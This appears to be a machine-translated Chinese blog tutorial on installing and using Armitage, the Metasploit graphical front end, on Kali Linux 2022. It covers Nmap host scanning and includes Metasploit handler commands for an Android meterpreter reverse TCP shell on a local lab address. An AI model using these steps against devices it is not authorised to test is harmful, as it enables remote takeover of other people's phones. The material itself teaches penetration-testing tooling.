当前位置:网站首页>Kali2022 installing Armitage
Kali2022 installing Armitage
2022-06-12 17:39:00 【Big cousin xiaoyaozi】
Armitage It's based on Java Of Metasploit Graphical interface attack software , You can use it to combine Metasploit Known in exploit To automate attacks against vulnerabilities in the host . Use... From the command line Metasploit It's more difficult , There are too many commands to remember , and Armitage Perfectly solved this problem , Users simply click on the menu , The security test and attack on the target host can be realized .Armitage Good graphical display interface , Make the attack process more intuitive , Better user experience . Because of its simplicity of operation , Especially suitable Metasploit Beginners test and attack the target system .
Armitage install
Armitage It's easy to install , We just need to execute the following commands .
apt-get update
apt-get install -y armitagefunction Armitage
Initialize first msf database , Carry out orders
msfdb init And then execute the command armitage Start the program .
After login, the interface is as follows
Host scan
In turn, click Hosts->Nmap Scan There are many scanning methods , It's all based on nmap Finished scanning . Of course, we can also use msf scan .
Above , We scanned this device , Click on the device Right click You can select the attack module for this device .
relevant shell operation
Here we have android shell Column First, in the kali Based on android Of shell Then configure the terminal
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -jfunction shell after , Successfully obtained permission
Visual file management
summary
armitage take msf Commands and results are presented graphically . It is convenient for us to upload and Download Preview files . Of course, it also has its disadvantages , necessary msfdb The configuration of the database is very weak .
Copyright belongs to : Big cousin xiaoyaozi
Link to this article :https://blog.bbskali.cn/3359.html
Sign off according to knowledge sharing - Noncommercial use 4.0 License by international agreement , The reprint of quoted articles shall follow the same agreement .
边栏推荐
- 卖疯了的临期产品:超低价、大混战与新希望
- A variety of Qt development methods, which do you choose?
- Introduction to several common functions of fiddler packet capturing (stop packet capturing, clear session window contents, filter requests, decode, set breakpoints...)
- The R language uses the pyramid function of epidisplay package to visualize the pyramid graph and the pyramid graph based on the existing summary data (table data)
- MySQL transaction introduction and transaction isolation level
- Selenium element positioning
- ftrace
- 字节飞书人力资源套件三面
- Codeforces Round #398 (Div. 2) D. Cartons of milk
- Unprecedented analysis of Milvus source code architecture
猜你喜欢

Hangzhou AI developer meetup registration opens!

A variety of Qt development methods, which do you choose?

Exclusive interview with oppo find X5 Product Manager: deeply cultivate self-developed chips to create the ultimate flagship experience with the highest standards
![Vulnhub[DC3]](/img/3a/1aa03e804d447d38e85807928fdb8f.png)
Vulnhub[DC3]

Volcano engine held a video cloud technology force summit and released a new experience oriented video cloud product matrix

The significance of writing technology blog

Unprecedented analysis of Milvus source code architecture

How to win the "Olympic Games" in retail technology for jd.com, the learning tyrant of the "regular examination"?

Saturated! Can't future programmers work anymore?

Atlas conflict Remote Code Execution Vulnerability (cve-2022-26134) vulnerability recurrence
随机推荐
分辨率与行场同步信号的关系 场消隐
认识函数原创
73. 矩阵置零(标记法)
徽商期货开户可靠吗?资金安全吗?
channel原创
迄今微软不同时期发布的SQL Server各版本之间的大致区别,供参考查阅
String s = null ; String s = new String();String s =““ ;String s ;有什么区别?
R语言使用plot函数可视化数据散点图,使用font.axis参数指定坐标轴刻度标签的字体类型为斜体字体(italic)
LCD参数解释及计算
Tidb Hackathon 2021 - pcloud: conduct icloud pcloud team interview on the database
Use GCC's PGO (profile guided optimization) to optimize the entire system
Compilation optimization of performance optimization
String的split方法的使用
(7) Loop statement for
Fiddler抓包几种常用功能介绍(停止抓包、清空会话窗内容、过滤请求、解码、设置断点......)
Vulnhub[DC3]
Is it cost-effective to apply for Huagui sweet home term life insurance? What are the advantages of this product?
The R language uses the aggregate The plot function visualizes the summary statistical information of each subset (visualization is based on the probability value and its 95% confidence interval of th
全局锁、表锁、行锁
MIPS 通用寄存器 + 指令